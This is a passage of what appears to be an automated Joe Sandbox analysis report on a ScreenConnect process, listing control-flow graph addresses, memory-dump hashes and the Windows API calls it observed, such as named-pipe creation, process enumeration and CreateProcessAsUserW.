                                                                                            • Instruction ID: c8b31a97e685e50896b247869dfbf66326ef3a70c883bd40f5c1353360d70cf3
                                                                                            • Opcode Fuzzy Hash: 05196da4f03f17fe97d7f81c8b1a1d41cd8b109a190ea685826d949dac0da633
                                                                                            • Instruction Fuzzy Hash: 082144B2800249DFDF20CF99C845BEEBBF4FB48324F148419E918A7250C379A551DFA5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 178 58718af-58718b1 179 58718b3-58718b8 178->179 180 58718a0-58718a8 178->180 181 58718da 179->181 182 58718ba 179->182 185 58718e1-58718e8 181->185 186 58718dc-58718de 181->186 183 58718c1-58718ca 182->183 184 58718bc-58718be 182->184 189 58718d1-58718d7 183->189 190 58718cc-58718ce 183->190 184->183 187 5871910-5871912 185->187 188 58718ea 185->188 186->185 193 5871914-5871922 187->193 194 5871919-5871922 187->194 191 58718f1-58718fa 188->191 192 58718ec-58718ee 188->192 189->181 190->189 195 5871901-5871903 191->195 196 58718fc 191->196 192->191 197 5871924 193->197 198 5871929-587192b 193->198 194->197 194->198 195->187 200 58728e0-5872944 195->200 196->195 197->198 199 5873df8-5873e86 ConnectNamedPipe 198->199 204 5873e8f-5873ed1 199->204 205 5873e88-5873e8e 199->205 206 5872946-587294c 200->206 207 587294d-587296a 200->207 213 5873ed3 204->213 214 5873edb 204->214 205->204 206->207 207->199 213->214 215 5873edc 214->215 215->215
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613770119.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5870000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 89ca33de72ac3749678c9ce993a5e20060ac50efbd12a7ee5499c27a6de581d5
                                                                                            • Instruction ID: 53d81fe357c46bf3ae6dfc53eccd75482fc6fa6195de1071d1be449925201bd6
                                                                                            • Opcode Fuzzy Hash: 89ca33de72ac3749678c9ce993a5e20060ac50efbd12a7ee5499c27a6de581d5
                                                                                            • Instruction Fuzzy Hash: EE618B75C0938C9FDB11CFA9C4557DEBFF0AF4A210F15449AD894E7252D7349908CBA1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 145 5716288-571629d 146 57162b2-57162b9 145->146 147 571629f-57162a2 145->147 148 57162be-5716302 call 5714dec 146->148 149 57162a8-57162b1 147->149 150 571636c-5716380 147->150 169 5716307-571630c 148->169 151 5716382 150->151 152 5716346-571634f 150->152 156 571638e-5716397 151->156 154 5716351-571636b 152->154 155 57163ac-571640e 152->155 161 5716410-5716418 155->161 162 571641a-5716450 K32EnumProcesses 155->162 161->162 163 5716452-5716458 162->163 164 5716459-5716481 162->164 163->164 170 5716312-5716315 169->170 171 5716398-57163a5 169->171 172 5716384-5716389 170->172 173 5716317-5716344 170->173 171->155 172->148 173->152 173->156
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613404981.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5710000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fac534eae8e988a1df7eabdeb29b798bcd98c0062576eaefe9ef4e1b05750ffc
                                                                                            • Instruction ID: 0e4fe776198efa2078f57f45f85487675a15fc2cfab93cb652cf19b6c37ff487
                                                                                            • Opcode Fuzzy Hash: fac534eae8e988a1df7eabdeb29b798bcd98c0062576eaefe9ef4e1b05750ffc
                                                                                            • Instruction Fuzzy Hash: 44519171A007058FDB24CFA9D884AAEF7F5FF88310F14892ED45AE7A40D734A945CBA5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 216 57124dc-57134b4 218 57134b6-57134db 216->218 219 5713508-571358b CreateFileA 216->219 218->219 222 57134dd-57134df 218->222 228 5713594-57135d2 219->228 229 571358d-5713593 219->229 223 57134e1-57134eb 222->223 224 5713502-5713505 222->224 226 57134ed 223->226 227 57134ef-57134fe 223->227 224->219 226->227 227->227 230 5713500 227->230 234 57135e2 228->234 235 57135d4-57135d8 228->235 229->228 230->224 237 57135e3 234->237 235->234 236 57135da 235->236 236->234 237->237
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05713575
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613404981.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5710000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: a28e43df61a03079f3546ec79c57e4e8eed346cc7149db2eb4040327adef3b94
                                                                                            • Instruction ID: c901d392fa2246fac287e7844c97023436af9992668abaaaa177885f68d6aff8
                                                                                            • Opcode Fuzzy Hash: a28e43df61a03079f3546ec79c57e4e8eed346cc7149db2eb4040327adef3b94
                                                                                            • Instruction Fuzzy Hash: 5B5156B1D003499FDB10CFAAC844B9EBFF2FB48704F258529E809AB291D7759845CF95

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 238 571344c-57134b4 239 57134b6-57134db 238->239 240 5713508-571358b CreateFileA 238->240 239->240 243 57134dd-57134df 239->243 249 5713594-57135d2 240->249 250 571358d-5713593 240->250 244 57134e1-57134eb 243->244 245 5713502-5713505 243->245 247 57134ed 244->247 248 57134ef-57134fe 244->248 245->240 247->248 248->248 251 5713500 248->251 255 57135e2 249->255 256 57135d4-57135d8 249->256 250->249 251->245 258 57135e3 255->258 256->255 257 57135da 256->257 257->255 258->258
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05713575
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613404981.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5710000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: ed20ba66473aef326b5e247535ea256f495e9a14dc4abc432d47cf231a8fc37d
                                                                                            • Instruction ID: 2817d17b4b90e0a31acbc1db6862e45135e0c3504683dabb3db7223ac1e6f3b6
                                                                                            • Opcode Fuzzy Hash: ed20ba66473aef326b5e247535ea256f495e9a14dc4abc432d47cf231a8fc37d
                                                                                            • Instruction Fuzzy Hash: 925176B1D003499FDB11CFAAC884B9EBFF2BB48704F258529E809AB391D7759844CF95

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 259 58761af-58761b8 260 5876216-5876268 259->260 261 58761ba-58761ca 259->261 264 5876270-58762a2 WaitNamedPipeW 260->264 265 587626a-587626d 260->265 266 58761cd-58761e8 call 58754ac 261->266 267 58762a4-58762aa 264->267 268 58762ab-58762d3 264->268 265->264 274 5876204-5876207 266->274 275 58761ea-58761ef 266->275 267->268 282 5876209 call 57133c0 274->282 283 5876209 call 5713408 274->283 280 58761f2 call 58762d8 275->280 281 58761f2 call 58762e8 275->281 276 587620f-5876213 277 58761f4-58761f6 277->274 278 58761f8 277->278 279 5876202 278->279 279->266 280->277 281->277 282->276 283->276
                                                                                            APIs
                                                                                            • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,058761E6), ref: 0587628F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613770119.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5870000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: NamedPipeWait
                                                                                            • String ID:
                                                                                            • API String ID: 3146367894-0
                                                                                            • Opcode ID: 49efb074ebef723a2be57d02deefe65c920d2da02f080897054a02da9ec13702
                                                                                            • Instruction ID: 2735379f3b0617ace434416a186fa8e14de2e318ae78cb65ac24b6c2a97ea51f
                                                                                            • Opcode Fuzzy Hash: 49efb074ebef723a2be57d02deefe65c920d2da02f080897054a02da9ec13702
                                                                                            • Instruction Fuzzy Hash: F1317C719002498BDB14CF9AC844BAEBBF5FF88314F14842AD859A7341E774E906CBA5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 284 587275a-58727b1 286 58727b3-58727b9 284->286 287 58727bc-58727c0 284->287 286->287 288 58727c2-58727c5 287->288 289 58727c8-58727dd 287->289 288->289 290 58727df-58727e8 289->290 291 58727eb-5872842 CreateProcessAsUserW 289->291 290->291 292 5872844-587284a 291->292 293 587284b-5872873 291->293 292->293
                                                                                            APIs
                                                                                            • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0587282F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613770119.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5870000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcessUser
                                                                                            • String ID:
                                                                                            • API String ID: 2217836671-0
                                                                                            • Opcode ID: ecd653f551db3e0c073d9b1786f280fe22417028adffbe52c78c593609b7721e
                                                                                            • Instruction ID: ba7f6ebbe39a5616ab56944ebdb7f10e8c27124aa7b9ccb27ffa05bb3e98cbb7
                                                                                            • Opcode Fuzzy Hash: ecd653f551db3e0c073d9b1786f280fe22417028adffbe52c78c593609b7721e
                                                                                            • Instruction Fuzzy Hash: 82413376900209EFCF11CFA9C884ADEBBF5FF48310F15842AE919A7250D375AA55CFA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 307 5871908-5871912 310 5871914-5871922 307->310 311 5871919-5871922 307->311 312 5871924 310->312 313 5871929-5873e86 ConnectNamedPipe 310->313 311->312 311->313 312->313 317 5873e8f-5873ed1 313->317 318 5873e88-5873e8e 313->318 322 5873ed3 317->322 323 5873edb 317->323 318->317 322->323 324 5873edc 323->324 324->324
                                                                                            APIs
                                                                                            • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 05873E70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613770119.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5870000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConnectNamedPipe
                                                                                            • String ID:
                                                                                            • API String ID: 2191148154-0
                                                                                            • Opcode ID: 0b4348f8bba8e58e6139c75921469e695c13302e23fcfe232a85827e8a8b4a45
                                                                                            • Instruction ID: f38732a350c83575176c44fb8148432153af7c79e83eb8ea5c34e53a1285c38f
                                                                                            • Opcode Fuzzy Hash: 0b4348f8bba8e58e6139c75921469e695c13302e23fcfe232a85827e8a8b4a45
                                                                                            • Instruction Fuzzy Hash: 0C315471D0835CAFDB20CFA9C484BDEBFF4AF49200F15849AE884AB251CB349945CFA5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 325 5873dec-5873e86 ConnectNamedPipe 328 5873e8f-5873ed1 325->328 329 5873e88-5873e8e 325->329 333 5873ed3 328->333 334 5873edb 328->334 329->328 333->334 335 5873edc 334->335 335->335
                                                                                            APIs
                                                                                            • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 05873E70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613770119.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5870000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConnectNamedPipe
                                                                                            • String ID:
                                                                                            • API String ID: 2191148154-0
                                                                                            • Opcode ID: 19276c2c21a276143e40f5f36c99ef12c555e973238c41645f0ca20558c45c93
                                                                                            • Instruction ID: a3e9fb963a16957ff7eaf7aecb1f5a8eb7eb6c6943c6eedc74fa9b8df5c71038
                                                                                            • Opcode Fuzzy Hash: 19276c2c21a276143e40f5f36c99ef12c555e973238c41645f0ca20558c45c93
                                                                                            • Instruction Fuzzy Hash: 70211671D0025C9FDB24CFAAC484BDEBBF4AF48604F148469E849A7350DB749945CFA1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 336 5871924-5873e86 ConnectNamedPipe 340 5873e8f-5873ed1 336->340 341 5873e88-5873e8e 336->341 345 5873ed3 340->345 346 5873edb 340->346 341->340 345->346 347 5873edc 346->347 347->347
                                                                                            APIs
                                                                                            • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 05873E70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613770119.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5870000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConnectNamedPipe
                                                                                            • String ID:
                                                                                            • API String ID: 2191148154-0
                                                                                            • Opcode ID: f0dd5a92f1b014a3f769ffe411d6849843f8e8a8d594419b64763b73cb62f5ed
                                                                                            • Instruction ID: d302cbd1b5e9fe7b73cd3edbecec35a86b2a1cfff90f4a2ea15e54a1f7553b53
                                                                                            • Opcode Fuzzy Hash: f0dd5a92f1b014a3f769ffe411d6849843f8e8a8d594419b64763b73cb62f5ed
                                                                                            • Instruction Fuzzy Hash: 7C2123B1D0421C9FDB24CFAAC484BDEBBF5AF48200F148469E859BB350DB749905CFA1
                                                                                            APIs
                                                                                            • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0571643D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613404981.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5710000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumProcesses
                                                                                            • String ID:
                                                                                            • API String ID: 84517404-0
                                                                                            • Opcode ID: e96182d81dcdae590a1abe132ad4d2c26bb3aa856e27e322a987cc6507c522ac
                                                                                            • Instruction ID: e00de7f59a241796d29f6513db61e559dbef35937a2e28487f9a1005e2bd1bbe
                                                                                            • Opcode Fuzzy Hash: e96182d81dcdae590a1abe132ad4d2c26bb3aa856e27e322a987cc6507c522ac
                                                                                            • Instruction Fuzzy Hash: 652128B29002099FDB10CF9AC845BDEFBF4FB48310F51842EE919B7640C378AA45CBA5
                                                                                            APIs
                                                                                            • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,058761E6), ref: 0587628F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613770119.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5870000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: NamedPipeWait
                                                                                            • String ID:
                                                                                            • API String ID: 3146367894-0
                                                                                            • Opcode ID: a0a7bef7b28e865a01f2403081ea5adbea59fe945f7633f9e874da1cbabcc7c5
                                                                                            • Instruction ID: 669db86c24460dd3514c46c154629977d7a20cd4151d271b36697ffb2f48ad2a
                                                                                            • Opcode Fuzzy Hash: a0a7bef7b28e865a01f2403081ea5adbea59fe945f7633f9e874da1cbabcc7c5
                                                                                            • Instruction Fuzzy Hash: 0E2102B28102498FDB10CF9AC444BEEBBF4FB88324F15846AD859B7240D779A945CFA5
                                                                                            APIs
                                                                                            • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0571651E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613404981.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5710000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessSession
                                                                                            • String ID:
                                                                                            • API String ID: 3779259828-0
                                                                                            • Opcode ID: 1d763114d0d628767f4ab03c2d59fb937a7fa4631412cfd021cfa189fcc235ab
                                                                                            • Instruction ID: ae6a18ad457cd78b93a9eddc853099dc7f5f5d3243dc9ca5485fd49945e3831f
                                                                                            • Opcode Fuzzy Hash: 1d763114d0d628767f4ab03c2d59fb937a7fa4631412cfd021cfa189fcc235ab
                                                                                            • Instruction Fuzzy Hash: BA1103B1C002498FDB20CF9AC444BEEBBF4FB48324F15846AD859B7640D379A645CFA5
                                                                                            APIs
                                                                                            • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0571651E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2613404981.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5710000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessSession
                                                                                            • String ID:
                                                                                            • API String ID: 3779259828-0
                                                                                            • Opcode ID: 5a361f07a5a111abf29263645a56cc2e6fc860d2c86e5a19b61a33c9232b2dde
                                                                                            • Instruction ID: d8530ae029b9a8e0fbe3244da21697bae7e1bf22bacee844245ad44e05be11fd
                                                                                            • Opcode Fuzzy Hash: 5a361f07a5a111abf29263645a56cc2e6fc860d2c86e5a19b61a33c9232b2dde
                                                                                            • Instruction Fuzzy Hash: 3E1133B2C002498FCB10CF9AD444BDEBBF4BB88224F15846AD858A7240C778A644CFA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2587506132.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_110d000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb30869bbd123a946faae2c02dcc10f824823d3ffc7e6db12e1e904da56e747e
                                                                                            • Instruction ID: f89c45d2544991b4a8cb1b563465fc6df011bbdf229d2509fdf553284022f0e3
                                                                                            • Opcode Fuzzy Hash: bb30869bbd123a946faae2c02dcc10f824823d3ffc7e6db12e1e904da56e747e
                                                                                            • Instruction Fuzzy Hash: 40212875904244DFDF1ADFD4E9C0B26BF65FB88324F208169E8090B297C376D456CAA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2587506132.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_110d000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                                                                            • Instruction ID: 607a8f5e4399e0d8d7e6266f9bb7266e5c89eb2637cfd170ce8714aedef0328e
                                                                                            • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                                                                            • Instruction Fuzzy Hash: 3411AF76904680CFDF17CF54D9C4B16BF62FB88324F2486A9D8090B257C376D456CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2587506132.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_110d000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5110327e860f4650236f46a6e4feeb227cdd9982e4a596b420335b0d48a7d6c8
                                                                                            • Instruction ID: bc784778cf257fc689eec2dd00c233209625c421c784a337dac8a9feb12154af
                                                                                            • Opcode Fuzzy Hash: 5110327e860f4650236f46a6e4feeb227cdd9982e4a596b420335b0d48a7d6c8
                                                                                            • Instruction Fuzzy Hash: 4901F771904304ABFB29CAA5D880B67BBD8EF452A4F18C419ED4C0A1C6C3B99441CAB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2587506132.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_110d000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 40013795de84656c22d178f29ceee23ac93b00de60582f1dc36a93cc362314f5
                                                                                            • Instruction ID: 6506f31c770a051dc519f20dddbfa4753bf14c9bc554a872c43daabcc47c7f32
                                                                                            • Opcode Fuzzy Hash: 40013795de84656c22d178f29ceee23ac93b00de60582f1dc36a93cc362314f5
                                                                                            • Instruction Fuzzy Hash: 4BF0C271404340AEEB258A5AD884B63FFD8EB81274F18C45AED8C0E2C7C3B99840CAB1
                                                                                            APIs
                                                                                            • RtlGetVersion.NTDLL(0000009C), ref: 01164DBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2588103689.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_1160000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            • Opcode ID: aa0fd89ffd271d0c37d4972d01009770566fb6992e6cbc68f305b92ca98eb9c2
                                                                                            • Instruction ID: a22fd2bd399ca9aae5b427481e7acb3558ac55a616fc841640788352e66fffef
                                                                                            • Opcode Fuzzy Hash: aa0fd89ffd271d0c37d4972d01009770566fb6992e6cbc68f305b92ca98eb9c2
                                                                                            • Instruction Fuzzy Hash: C4213671911328DFEB60CF55CC44B9AFBB9FB48200F0086D9D50CA3680C7756A98CFA2

                                                                                            Execution Graph

                                                                                            Execution Coverage:13%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:27.3%
                                                                                            Total number of Nodes:11
                                                                                            Total number of Limit Nodes:1
                                                                                            execution_graph 25580 7ff886c55c05 25581 7ff886c55c1f CreateNamedPipeW 25580->25581 25583 7ff886c55d73 25581->25583 25571 7ff886c55db1 25572 7ff886c55dbf ConnectNamedPipe 25571->25572 25574 7ff886c55e92 25572->25574 25575 7ff886c38014 25577 7ff886c3801d 25575->25577 25576 7ff886c38082 25577->25576 25578 7ff886c380f6 SetProcessMitigationPolicy 25577->25578 25579 7ff886c38152 25578->25579

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 339 7ff886c55c05-7ff886c55caa 342 7ff886c55cac-7ff886c55cb1 339->342 343 7ff886c55cb4-7ff886c55d71 CreateNamedPipeW 339->343 342->343 345 7ff886c55d79-7ff886c55dac 343->345 346 7ff886c55d73 343->346 346->345
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C53000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C53000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c53000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateNamedPipe
                                                                                            • String ID:
                                                                                            • API String ID: 2489174969-0
                                                                                            • Opcode ID: afb6b5177b715efafd277ac62f8db1aa3c16d9fdbba5f98e2c8c0ffe9a1d697c
                                                                                            • Instruction ID: b16973f3c1fee99bc9b8f89d57bf683bb6dd8c5bc571de8e3feeb2cba60bfa6c
                                                                                            • Opcode Fuzzy Hash: afb6b5177b715efafd277ac62f8db1aa3c16d9fdbba5f98e2c8c0ffe9a1d697c
                                                                                            • Instruction Fuzzy Hash: 6D51BE7191CB588FDB59EF689805BA97BF0FB59710F0442AED04DD3252CB34A845CBC2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eadf61455c6713d37b05bf07b31e48c39b9e9e3a9b53a25179502a62639d0359
                                                                                            • Instruction ID: fffe296dbb766fe2f94d61e215693105e305c42e2e69ef2c271be00e90dc2cd6
                                                                                            • Opcode Fuzzy Hash: eadf61455c6713d37b05bf07b31e48c39b9e9e3a9b53a25179502a62639d0359
                                                                                            • Instruction Fuzzy Hash: 13720131E9CA4B4BEB99AB289465BB933D2FF94380F544079D44ED76C6DE28EC06C341
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 87fa83d263469343c40d2bc41b03e56e102b02c26edb0c871146a5865e7804b9
                                                                                            • Instruction ID: 95964d256ab872238c08bee70e32b5a5acb872cbd9058cde38acc012206a8212
                                                                                            • Opcode Fuzzy Hash: 87fa83d263469343c40d2bc41b03e56e102b02c26edb0c871146a5865e7804b9
                                                                                            • Instruction Fuzzy Hash: 1B620430A5CA4A8FEB99EB288495BB977E2FF94380F50407DD04ED3692DE28EC45C741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 96b8382c88221baed1876240d717a9a457e0d586423a556461a281ffc5bac0e5
                                                                                            • Instruction ID: 4d59f6a06422a7f08ffffbec47f4ddd2f1ec4fa2acdcae7fc9e2a31604927d84
                                                                                            • Opcode Fuzzy Hash: 96b8382c88221baed1876240d717a9a457e0d586423a556461a281ffc5bac0e5
                                                                                            • Instruction Fuzzy Hash: 12122131A5CA4E4FE799EB6C9495AB537D1FFA9390F4440BAD44EC7292ED28EC42C340
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 95a68012cd56282d88aec049b58558ed5a64a94efd6ac912257f033f9e63b54a
                                                                                            • Instruction ID: e4650bb072ac1ca20fdbffea17168aca5a9414a07e2961ded0bcc30e1d0ab1f4
                                                                                            • Opcode Fuzzy Hash: 95a68012cd56282d88aec049b58558ed5a64a94efd6ac912257f033f9e63b54a
                                                                                            • Instruction Fuzzy Hash: 97F1E431E9CA4B4AE7A99B288461AB933D2FF94384F544479D44ED76C2DE28FC06C341
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 331ac9ed7f241207bef7c34bb410efb8463043da41086945f040b9005108bdab
                                                                                            • Instruction ID: 846d0462b3510d4397aa40bea8ff211fb61480987283231c7dd2fb1ca4737f6a
                                                                                            • Opcode Fuzzy Hash: 331ac9ed7f241207bef7c34bb410efb8463043da41086945f040b9005108bdab
                                                                                            • Instruction Fuzzy Hash: 56E1D530E9DA4F4AEB9AA7288560AB932D2FF94384F544479D40ED76C2DE2DFC06C241
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
